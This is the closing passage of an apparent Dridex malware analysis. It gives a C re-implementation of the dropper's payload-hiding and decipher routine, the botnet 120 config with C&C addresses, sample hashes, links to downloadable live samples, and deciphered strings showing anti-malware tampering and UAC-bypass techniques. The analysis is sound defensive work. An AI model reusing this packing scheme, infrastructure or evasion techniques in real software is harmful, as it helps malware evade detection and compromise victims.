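As an added example (my own code, written from the listings above; neither the dropper's code nor the article's own C listing), here is a C re-implementation of the three pieces of this procedure: the generation of the 20-byte signature block at 0x581, the backward scan that unmasks the two sizes and the key with a XOR, and bufferDecipher with its stack-modified key schedule (ROL 4, ROL 2, ROL 1, then the three subtractions, which is what the "Modifying data via the stack" section describes). Two details of the disassembly are reproduced deliberately: the loop runs bufferSize - 3 times and advances ESI by one byte, so each 4-byte XOR overlaps the previous one by three bytes, and the five iterations from the seed 0xA0D3CD56 regenerate exactly the bytes printed above, which validates the reading of the routine. The placement of the enciphered data right after the 20-byte header, the test payload and the key value 0x1234ABCD are assumptions of the example; the encipher routine exists only to build test data.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static uint32_t rol32(uint32_t v, unsigned n) { return (v << n) | (v >> (32 - n)); }
static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Routine at 0x581: five passes of eax += rol(eax, 7) from the seed 0xA0D3CD56, each result
 * stored with stosd. Produces the 20-byte dridexDropperSignature block. */
static void build_signature(uint8_t out[20]) {
    uint32_t eax = 0xA0D3CD56u;
    for (int i = 0; i < 5; i++) {
        eax += rol32(eax, 7);
        put_le32(out + 4 * i, eax);
    }
}

/* Key schedule of bufferDecipher, done on the pushed copy of the key: rotations at 0x293/0x29E/0x2A8
 * (4 + 2 + 1 = 7 bits), then the subtractions at 0x2B2, 0x2B8 and 0x2C4, all mod 2^32. */
static uint32_t next_key(uint32_t key, uint32_t buffer_size) {
    key = rol32(key, 7);
    key -= buffer_size;
    key -= 0x49613F8Au;
    key -= 0x34C348u;
    return key;
}

/* bufferDecipher (0x24E): buffer_size - 3 iterations; each XORs the 4 bytes at buf+i with the
 * current key, then ESI moves one byte forward, so consecutive XORs overlap by 3 bytes. */
static void buffer_decipher(uint8_t *buf, uint32_t buffer_size, uint32_t key) {
    if (buffer_size < 4) return;                   /* the original would underflow EBX here */
    for (uint32_t i = 0; i + 3 < buffer_size; i++) {
        put_le32(buf + i, get_le32(buf + i) ^ key);
        key = next_key(key, buffer_size);
    }
}

/* Exact inverse (test data only): same keystream, XORs applied in reverse order. */
static void buffer_encipher(uint8_t *buf, uint32_t buffer_size, uint32_t key) {
    if (buffer_size < 4) return;
    uint32_t n = buffer_size - 3, *ks = malloc(n * sizeof *ks);
    for (uint32_t i = 0; i < n; i++) { ks[i] = key; key = next_key(key, buffer_size); }
    for (uint32_t i = n; i-- > 0; ) put_le32(buf + i, get_le32(buf + i) ^ ks[i]);
    free(ks);
}

typedef struct { uint32_t comp_size, uncomp_size, key; const uint8_t *data; } payload_hdr_t;

/* Scan the reloaded image backwards for signature/signature2 and unmask the three fields that
 * follow with the keys of the signature block. Assumption (not stated by the article): the
 * enciphered, compressed payload starts right after the 20-byte header. */
static int find_payload(const uint8_t *img, size_t len, payload_hdr_t *h) {
    uint8_t sig[20];
    build_signature(sig);
    if (len < 20) return 0;
    for (size_t off = len - 20; ; off--) {
        if (get_le32(img + off) == get_le32(sig) && get_le32(img + off + 4) == get_le32(sig + 4)) {
            h->comp_size   = get_le32(img + off + 8)  ^ get_le32(sig + 8);   /* compressedModuleSizeKey */
            h->uncomp_size = get_le32(img + off + 12) ^ get_le32(sig + 12);  /* uncompressedModuleSizeKey */
            h->key         = get_le32(img + off + 16) ^ get_le32(sig + 16);  /* decipheringKey */
            h->data = img + off + 20;
            return h->comp_size <= len - off - 20;
        }
        if (off == 0) return 0;
    }
}

/* Constructed stand-in for the host executable: filler, then header, then enciphered payload. */
static size_t build_image(uint8_t *img, const uint8_t *plain, uint32_t n, uint32_t key) {
    uint8_t sig[20];
    build_signature(sig);
    size_t off = 32;
    memset(img, 0xCC, off);                                        /* constructed filler bytes */
    memcpy(img + off, sig, 8); off += 8;                            /* signature, signature2 in clear */
    put_le32(img + off, n ^ get_le32(sig + 8)); off += 4;           /* masked compressed size */
    put_le32(img + off, (2 * n) ^ get_le32(sig + 12)); off += 4;    /* masked uncompressed size (arbitrary here) */
    put_le32(img + off, key ^ get_le32(sig + 16)); off += 4;        /* masked deciphering key */
    memcpy(img + off, plain, n);
    buffer_encipher(img + off, n, key);
    return off + n;
}

int main(void) {
    uint8_t sig[20], plain[40], img[256], out[40];
    build_signature(sig);
    for (int i = 0; i < 20; i++) printf("%02X ", sig[i]);
    putchar('\n');
    for (int i = 0; i < 40; i++) plain[i] = (uint8_t)(i * 7 + 1);   /* constructed payload */
    size_t len = build_image(img, plain, 40, 0x1234ABCDu);
    payload_hdr_t h;
    if (!find_payload(img, len, &h)) return 1;
    memcpy(out, h.data, 40);
    buffer_decipher(out, 40, h.key);
    printf("comp=%u uncomp=%u key=%08X roundtrip=%s\n", (unsigned)h.comp_size, (unsigned)h.uncomp_size,
           (unsigned)h.key, memcmp(out, plain, 40) == 0 ? "ok" : "FAIL");
    return 0;
}
```

Because of the one-byte stride, a plain dword-by-dword XOR with the same key sequence does not decrypt this buffer; an unpacking script has to apply the XORs in the same order and with the same overlap as the dropper, which is why the key schedule above is separated out and fed the buffer size on every step.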
So What ? Download final Dridex payload DLL !
Once launched, the payload proves to be the Dridex "botnet 120", with this deciphered configuration:
<config botnet="120">
  <server_list>
    50.63.174.16:6443
    79.143.191.147:6443
    37.143.9.63:4433
  </server_list>
</config>
Botnet 120 contacts its C&C (50.63.174.16) and downloads the final Dridex payload DLL from 79.143.191.147:
Final payload downloaded by "botnet 120" | |
---|---|
Origin | Downloaded by botnet 120 from 79.143.191.147 on June 23, 2015 |
Name | 27.tmp |
Size | 491 520 bytes |
Date | NA |
MD5 | D7113159AC45B5958AD69D33B066529D |
SHA256 | A1254BF4F9E8D3BA808E1C3F9B840130569892905B7A209B1B7CE1B4610602C4 |
VirusTotal (14/57 on the 06/23/2015) | |
malwr |
Note that while this analysis was under way a new dropper campaign started, with similar VBA and VBS code but a different intermediate dropper.
To be continued...
Appendices
Modifications
- June 18, 2015 01:30 - first upload
- June 18, 2015 22:15
- forgot to put the x86 dropper commented disassembled listing. Here it is !
- link to the French page corrected. Sorry :-/
- June 19, 2015 01:08 - Payload deciphered strings added in appendices
- June 24, 2015 00:02 - Illustration modified (Step 9 added), payload ("botnet 120") config added and final Payload added.
Downloadable files
- Word document with Dridex dropper, pwd="infected" - WARNING: even though the URL is down, don't execute the macros!
- Dridex intermediate dropper 1 - VBS script, pwd="infected" - WARNING: even though the URL is down, don't execute this script!
- Dridex intermediate dropper .net assembly, pwd="infected" - WARNING: don't execute this one!!!
- Dropper x86, pwd="infected" - x86 dropper code
- Dropper x86 disassembled and commented
- Dridex "botnet 120" payload, pwd="infected" - WARNING: don't execute this one!!!
- Dridex final payload downloaded by "botnet 120", pwd="infected" - WARNING: don't execute this one!!!
Tools used
The tools used are fairly standard.
- IDA Pro The best known and most pleasant to use since Sourcer !
- ILSpy Open-source .NET assembly browser and decompiler.
- VirtualBox In order to dynamically study the x86 dropper
- Oletools Very good OLE files analyzer. Can extract macros from documents.
- OllyDbg To run the dropper in a VM and follow its code, it complements the static analysis with IDA
- PEview and pestudio to easily dump the payload resources
Links
- Evolution of Dridex June 18, 2015
- Chasing cybercrime : network insights of Dyre and Dridex Trojan Bankers Blueliv, april 2015
- McAfee Labs Threat Advisory : Dridex June 15, 2015
- 'Banking' Malware Dridex Arrives via Phishing Email McAfee Labs - Mar 26, 2015
- Dridex Code Breaking – Modify the Malware to Bypass the VM Bypass An older Dridex dropper
- TSPY_DRIDEX.WQJ - Threat Encyclopedia November 19,2014
Payload (botnet 120) deciphered strings
Although I have not reversed all of botnet 120 yet, I deciphered some of the encrypted string blocks. They confirm that this is the Dridex botnet 120 malware:
Config :
Deciphered strings of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F2
Offset. : In memory decipher
<config botnet="120">
  <server_list>
    50.63.174.16:6443
    79.143.191.147:6443
    37.143.9.63:4433
  </server_list>
</config>
First strings block :
Deciphered strings (1/5) of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
Offsets : 0x40A058-0x40A27F (PE file offsets : 0x9058-0x927F)
Count String
0 MBAMService
1 $$$Secure UAP
2 Program Manager
3 Progman
4 edg
5 .tmp
6 .exe
7 updfiles\
8 upd.ver
9 lastupd.ver
10 \Avg20%d\update\
11 download
12 \TEMP\avwin.ini
13 "%savconfig.exe" /SAVEAVWININI="avwin.ini;"
14 Local AppData
15 {A520A1A4-1780-4FF6-BD18-167343C5AF16}
16 AppDataDir
17 AppDataDirectory
18 Path
Second strings block :
Deciphered strings (2/5) of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
Offsets : 0x40A280-0x40DA9F (PE file offsets : 0x9280-0xCA9F)
Count String
0 SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName
1 SOFTWARE/Microsoft/Windows NT/CurrentVersion
2 <loader><get_module unique="%s" botnet="%d" system="%d" name="bot" bit="%d"/>
3 SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
4 <soft><![CDATA[
5 ]]></soft></loader>
6 <module
7 Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
8 botnet="
9 <server_list>
10 </server_list>
11 rundll32.exe "%S" NotifierInit
12 $&=-+?,~ +=&_.$~@abcsefghijklmnopqrstuvwxyz0123456789ABCSEFGHIJKLMNOPQRSTUVWXYZ
13 <cfg net="%d" build="0"><startup>%s</startup><del>%S</del></cfg>
14 Software/Microsoft/Windows/CurrentVersion/Explorer/CLSID/%s/ShellFolder
15 ComputerName
16 Volatile Environment
17 InstallDate
18 USERNAME
19 <nodes>
20 </nodes>
21 ALLUSERSPROFILE
22 \Malwarebytes\Malwarebytes Anti-Malware\
23 exclusions.dat
24 Configuration\settings.conf
25 Configuration\scheduler.conf
26 SYSTEM/CurrentControlSet/services/MBAMProtector/Parameters
27 ProductPath
28 \mbam.dll
29 ProtectionStop
30 SchedulerStop
31 SelfProtectionDisable
32 .KB
33 DisplayName
34 DisplayVersion
35 SOFTWARE/ESET/ESET Security/CurrentVersion/Info
36 SYSTEM/CurrentControlSet/services/Avg/SystemValues
37 SOFTWARE/Avira/Antivir Desktop
[...]
lobal\
43 Starting path:
Third strings block:
Deciphered strings (3/5) of Dridex Botnet 120 Malware

- Date: June 08, 2015
- MD5: 7AC7416FCAB7745F9000EA3E281C8318
- SHA256: BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
- Offsets: 0x40DB40-0x40DCEF (PE file offsets: 0xCB40-0xCCEF)

| Count | String |
|---|---|
| 0 | `LOCALAPPDATA` |
| 1 | `S:(ML;;NW;;;LW)` |
| 2 | `Low\%s` |
| 3 | `.sdb` |
| 4 | `.bat` |
| 5 | `open` |
| 6 | `sdbinst.exe` |
| 7 | `iscsicli.exe` |
| 8 | `/q "%s"` |
| 9 | `\System32\` |
| 10 | `\SysWOW64\` |
| 11 | `GET` |
| 12 | `POST` |
| 13 | `sysprep` |
| 14 | `cryptbase.dll` |
| 15 | `Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}` |
Imported function names (each entry is a DLL_ID followed by a function name; the DLL_ID to module name mapping is in block 5/5):
Deciphered strings (4/5) of Dridex Botnet 120 Malware

- Date: June 08, 2015
- MD5: 7AC7416FCAB7745F9000EA3E281C8318
- SHA256: BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
- Offsets: 0x40DCF0-0x40F257 (PE file offsets: 0xCCF0-0xE257)

Function names grouped by DLL_ID, in the order they appear in the table (the module name in parentheses comes from block 5/5):

- DLL_ID 001 (kernel32.dll): LoadLibraryA, LoadLibraryW, GetProcAddress, AllocConsole, CancelIoEx, CloseHandle, CompareStringA, CompareStringW, CreateDirectoryW, CreateEventA, CreateFileMappingW, CreateFileA, CreateFileW, CreateMutexA, CreateProcessW, CreateRemoteThread, CreateThread, CreateToolhelp32Snapshot, DeleteFileA, DeleteFileW, DeviceIoControl, DisableThreadLibraryCalls, DuplicateHandle, ExitProcess, ExitThread, ExpandEnvironmentStringsA, ExpandEnvironmentStringsW, FileTimeToDosDateTime, FileTimeToLocalFileTime, FileTimeToSystemTime, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, FindNextFileW, FreeConsole, FreeLibrary, GetCommandLineW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDriveTypeW, GetEnvironmentVariableA, GetEnvironmentVariableW, GetExitCodeProcess, GetExitCodeThread, GetFileAttributesW, GetFileInformationByHandle, GetFileSize, GetLastError, GetLocalTime, GetLogicalDrives, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetProcessHeap, GetShortPathNameA, GetShortPathNameW, GetStartupInfoW, GetStdHandle, GetSystemDirectoryW, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetTempFileNameA, GetTempFileNameW, GetTempPathW, GetThreadPriority, GetTickCount, GetVersionExW, GetWindowsDirectoryW, GlobalLock, GlobalUnlock, HeapCreate, HeapDestroy, HeapAlloc, HeapFree, HeapReAlloc, IsBadReadPtr, IsDebuggerPresent, IsProcessorFeaturePresent, IsWow64Process, LocalAlloc, LocalFree, MapViewOfFile, MultiByteToWideChar, OpenEventA, OpenMutexA, OpenProcess, OpenThread, OutputDebugStringA, PeekConsoleInputA, Process32FirstW, Process32NextW, QueryDosDeviceW, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleInputA, ReadFile, ReadProcessMemory, ReleaseMutex, RemoveDirectoryW, ResetEvent, ResumeThread, SetEvent, SetFileAttributesA, SetFileAttributesW, SetFilePointer, SetFileTime, SetLastError, SetThreadPriority, Sleep, SystemTimeToFileTime, SuspendThread, TerminateProcess, TerminateThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, Thread32First, Thread32Next, UnmapViewOfFile, VirtualAlloc, VirtualAllocEx, VirtualFree, VirtualFreeEx, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte, WriteConsoleA, WriteFile, WriteProcessMemory
- DLL_ID 005 (advapi32.dll): AllocateAndInitializeSid, CloseServiceHandle, ConvertStringSecurityDescriptorToSecurityDescriptorW, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEncrypt, CryptExportKey, CryptGenKey, CryptGenRandom, CryptGetHashParam, CryptGetUserKey, CryptHashData, CryptImportKey, CryptReleaseContext, CryptSignHashW, CryptVerifySignatureW, EqualSid, FreeSid, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, IsValidSid, OpenProcessToken, OpenSCManagerW, OpenServiceW, QueryServiceStatus, RegCloseKey, RegCreateKeyExA, RegDeleteValueA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegQueryValueExA, RegQueryValueExW, RegSetValueExA
- DLL_ID 011 (psapi.dll): EnumProcessModulesEx, GetModuleBaseNameW, GetModuleInformation, GetProcessImageFileNameW
- DLL_ID 002 (ntdll.dll): LdrGetDllHandle, LdrGetProcedureAddress, NtDuplicateObject, RtlComputeCrc32, RtlCreateUserThread, RtlFillMemory, RtlInitUnicodeString, RtlMoveMemory, RtlZeroMemory, RtlQueryElevationFlags, NtAllocateVirtualMemory, NtFreeVirtualMemory, NtProtectVirtualMemory, NtReadVirtualMemory, NtWriteVirtualMemory, NtQueryInformationProcess, NtQueryObject, NtQuerySystemInformation, NtQueryVirtualMemory
- DLL_ID 009 (shell32.dll): CommandLineToArgvW, SHCreateItemFromParsingName, ShellExecuteExW, SHGetFolderPathW
- DLL_ID 007 (shlwapi.dll): SHDeleteKeyA, StrChrIA, StrChrIW, StrStrIA, StrStrIW, StrToIntA, StrToIntW, StrToIntExA, StrToIntExW, wvnsprintfA, wvnsprintfW
- DLL_ID 010 (crypt32.dll): CertCloseStore, CertEnumCertificatesInStore, CertOpenSystemStoreW, CryptBinaryToStringA, CryptDecodeObject, CryptDecodeObjectEx, CryptEncodeObject, CryptEncodeObjectEx, CryptExportPublicKeyInfo, CryptImportPublicKeyInfo, CryptStringToBinaryA, PFXExportCertStoreEx
- DLL_ID 012 (gdi32.dll): BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, SelectObject
- DLL_ID 003 (ws2_32.dll): __WSAFDIsSet, accept, bind, closesocket, connect, freeaddrinfo, getaddrinfo, gethostbyname, getsockopt, htons, ioctlsocket, listen, ntohs, recv, select, send, setsockopt, shutdown, socket, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAGetOverlappedResult, WSARecv, WSASend, WSASetEvent, WSASetLastError, WSAStartup
- DLL_ID 004 (user32.dll): CallWindowProcW, CharLowerA, CharLowerW, CharUpperA, CharUpperW, GetClipboardData, EnumWindows, ExitWindowsEx, GetClassNameW, GetCursorPos, GetDC, GetKeyboardState, GetSystemMetrics, GetWindowTextW, GetWindowThreadProcessId, MessageBoxA, MessageBoxW, ReleaseDC, SetForegroundWindow, SwitchToThisWindow, ToUnicode, TranslateMessage
- DLL_ID 008 (wininet.dll): InternetOpenUrlA, InternetOpenUrlW, InternetSetStatusCallbackA, InternetSetStatusCallbackW, InternetOpenA, InternetOpenW, InternetConnectA, InternetConnectW, HttpAddRequestHeadersA, HttpAddRequestHeadersW, HttpOpenRequestA, HttpOpenRequestW, HttpSendRequestA, HttpSendRequestW, InternetQueryOptionA, InternetQueryOptionW, InternetSetOptionA, InternetSetOptionW, HttpQueryInfoA, HttpQueryInfoW, InternetQueryDataAvailable, InternetReadFile, InternetReadFileExA, InternetReadFileExW, InternetCloseHandle
- DLL_ID 006 (cabinet.dll): FCIAddFile, FCICreate, FCIDestroy, FCIFlushCabinet
- DLL_ID 013 (WinSCard.dll): SCardEstablishContext, SCardGetStatusChangeW, SCardListReadersW, SCardReleaseContext
- DLL_ID 014 (wtsapi32.dll): WTSEnumerateSessionsW, WTSFreeMemory, WTSQueryUserToken
- DLL_ID 015 (ole32.dll): CoCreateInstance, CoGetObject, CoInitialize, CoUninitialize
- DLL_ID 004 (user32.dll, two entries listed last in the table): GetWindowLongW, SetWindowLongW
And lastly, the imported module IDs and names:
Deciphered strings (5/5) of Dridex Botnet 120 Malware

- Date: June 08, 2015
- MD5: 7AC7416FCAB7745F9000EA3E281C8318
- SHA256: BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
- Offsets: 0x40F258-0x40F3CB (PE file offsets: 0xE258-0xE3CB)

| DLL_ID | DLL_Name |
|---|---|
| 0 | - |
| 1 | kernel32.dll |
| 2 | ntdll.dll |
| 3 | ws2_32.dll |
| 4 | user32.dll |
| 5 | advapi32.dll |
| 6 | cabinet.dll |
| 7 | shlwapi.dll |
| 8 | wininet.dll |
| 9 | shell32.dll |
| 10 | crypt32.dll |
| 11 | psapi.dll |
| 12 | gdi32.dll |
| 13 | WinSCard.dll |
| 14 | wtsapi32.dll |
| 15 | ole32.dll |
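As an added example (not the author's tooling), the following Python joins the deciphered import-name table (4/5) with the module-ID table (5/5) the way an analyst would when triaging such a dump: it resolves each DLL_ID to its module name, groups the functions per module, and reports which API clusters are fully present. The embedded excerpt is copied from the tables above; the cluster definitions are my own assumption and only a small triage aid.

```python
"""Resolve a DLL_ID/function table against a DLL_ID/name table and flag API
clusters worth noting during triage (added example, not the author's code)."""
from collections import defaultdict

# Excerpt of block 5/5 (DLL_ID DLL_Name) from the deciphered strings above.
DLL_TABLE = """0 -
1 kernel32.dll
2 ntdll.dll
3 ws2_32.dll
4 user32.dll
5 advapi32.dll
8 wininet.dll"""

# Excerpt of block 4/5 (DLL_ID Function_name), same format as the dump.
IMPORT_TABLE = """001 LoadLibraryA
001 GetProcAddress
001 VirtualAllocEx
001 WriteProcessMemory
001 CreateRemoteThread
001 IsDebuggerPresent
002 NtQueryInformationProcess
003 connect
005 CryptSignHashW
008 HttpSendRequestW"""

# Assumed triage clusters: a cluster is reported only when every API in it is imported.
CLUSTERS = {
    "remote-thread injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "dynamic API resolution": {"LoadLibraryA", "GetProcAddress"},
    "debugger checks": {"IsDebuggerPresent"},
    "http client": {"HttpSendRequestW"},
}

def parse_dll_table(text):
    """Map numeric DLL_ID -> module name (IDs in the dump are unpadded here, padded in 4/5)."""
    names = {}
    for line in text.splitlines():
        dll_id, name = line.split(None, 1)
        names[int(dll_id)] = name
    return names

def resolve_imports(import_text, dll_names):
    """Group imported function names by resolved module name, preserving dump order."""
    by_dll = defaultdict(list)
    for line in import_text.splitlines():
        dll_id, func = line.split(None, 1)
        by_dll[dll_names.get(int(dll_id), f"unknown#{dll_id}")].append(func)
    return dict(by_dll)

def capability_clusters(by_dll):
    """Return the sorted names of clusters whose APIs are all present."""
    present = {f for funcs in by_dll.values() for f in funcs}
    return sorted(name for name, apis in CLUSTERS.items() if apis <= present)

if __name__ == "__main__":
    resolved = resolve_imports(IMPORT_TABLE, parse_dll_table(DLL_TABLE))
    for dll, funcs in resolved.items():
        print(f"{dll}: {', '.join(funcs)}")
    print("clusters:", capability_clusters(resolved))
```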